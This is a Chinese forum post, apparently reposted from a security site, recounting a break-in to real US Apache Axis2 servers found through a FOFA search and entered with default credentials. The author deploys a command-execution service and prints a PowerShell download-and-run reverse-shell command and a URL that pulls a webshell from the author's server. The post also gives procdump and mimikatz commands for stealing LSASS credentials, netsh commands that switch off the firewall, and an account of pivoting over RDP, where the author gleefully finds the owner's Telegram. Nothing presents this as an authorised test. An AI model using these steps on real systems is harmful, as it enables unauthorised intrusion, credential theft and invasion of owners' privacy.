跳转到帖子

recommended_posts

发布于
  • Members

0x01 目标

country="US" && app="APACHE-Axis"

从老洞捡些漏网之鱼,没准还会有意外收获

5v2wlqoeyn59372.png

目标出现

zfikciktxke9373.png

还是熟悉的页面,熟悉的端口

然后尝试默认口令登录,ok, 这下稳了

mrvjeg3n3um9374.png

先搜集一下信息

4akovqydgm39375.png

不要上来就部署包,先看一下现有的服务,像这种弱口令的基本上99.9999%都已经被人搞过了

1ntj2be5z4t9376.png

iovb5j2dl5g9377.png

再上传包就多此一举了,可以直接利用

找了一圈没发现遗留的马儿

找绝对路径自己上传

C:/elocker/webapps/admin/WEB-INF/classes

e52yc2nheyr9378.png

顺手一测,竟然可以出网,也不需要传shell了,直接掏出cs

zuario12smp9379.png

执行命令

3gzkfntftbk9380.png

看结果失败了

0x02 反弹shell

难道是因为在url里执行,导致powershell命令没有执行成功吗?

带着这个疑问 反弹shell尝试一下

abaqupujkcu9381.png

hnrgh2pdwuf9382.png

结果还是失败,可以确定,应该是有waf

0x03 写入shell

x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp

cjkqzqcb3lq9383.png

0xzj00z1wb39384.png

查看一下进程

1exwuq4ejkd9385.png

通过对比发现某安全卫士

f4vvjtrr15j9386.png

0x04 绕过杀软

通过测试发现,最基本的net user也执行不了

摆在面前的路只有2条

  • 做免杀
  • 抓密码

果断选择抓密码,简单有效。

mimikatz不免杀不可直接用

这里我利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码

上传 procdump64.exe 并下载lsass.dmp

ar1rs13wbnk9387.png

et02uodpo1x9388.png

再在本地解析文件

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# 导出为lsass.dump文件
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
# 把lsass.dmp放在mimikatz目录利用

cyo1mgrvqr49389.png

得到hash,破解密码

y0jmvhmotm09390.png

0x05 登录服务器

查看防火墙状态

Netsh Advfirewall show allprofiles

关闭防火墙

NetSh Advfirewall set allprofiles state off

jl2iinfeyrd9391.png

vw4ekatnimz9392.png

内网IP,需搭建代理

zi2uuk1oobg9393.png

4okuaz13h159394.png

5ncdlzbsy439395.png

0x06 登录云桌面,发现意外惊喜

发现机主运行了 telegram,嘿嘿

zzz4h3ps4n49396.png

lr5l1idzwl09397.png

qwjpahbl0o09398.png

0x07 总结

1.通过fofa的语法country="US" && app="APACHE-Axis"进行搜索漏洞目标2.发现存在一个axis2的后台,该页面存在弱口令(admin/axis2)3.在后台处的upload  sevice处上传AxisInvoker.aar包4.查询到网站的绝对路径为:C:/elocker/webapps/admin/WEB-INF/classeshttp://www.xxx.com/axis2/services/AxisInvoker/info5.尝试通过cs生成posershell后门程序,通过访问下面地址触发,但是访问失败(可能系统中存在杀软拦截了)http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress yourip -port 6666http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=dir%20C:6.通过下载文件方式写入大马http://www.xxx.com/axis2/services/AxisInvoker/download?url=http://vps/data.txt&file=C:\elocker\webapps\admin\axis2-web\shell.jsp7.在大马中执行tasklist,发现存在360tary(360杀毒)以及zhudongfangyu.exe(安全卫士)8.在大马中上传冰蝎的一句户话木马,然后连接,执行命令net user出错。9.这里通过冰蝎上传 procdump64.exe,并执行命令导出lsass.dmp procdump64.exe -accepteula -ma lsass.exe lsass.dmp10.通过冰蝎下载 lsass.dmp到本地。11.通过mimkiatz导入lsass.dump并读取出hash值mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit12.通过md5破解网站对HSAH值进行NTML破解,并成功破解出密码:123QWEqwe13.通过大马执行以下命令Netsh Advfirewall show allprofiles  //查看防火墙状态NetSh Advfirewall set allprofiles state off  //关闭防火墙14.通过冰蝎自带的socke功能开启代理,本地设置Proxifier代理将MSTSC添加到代理中15.通过代理执行mstsc,远程桌面登录内网,桌面发现存在telegram

原文链接: https://xz.aliyun.com/t/9856
  • 查看数 725
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…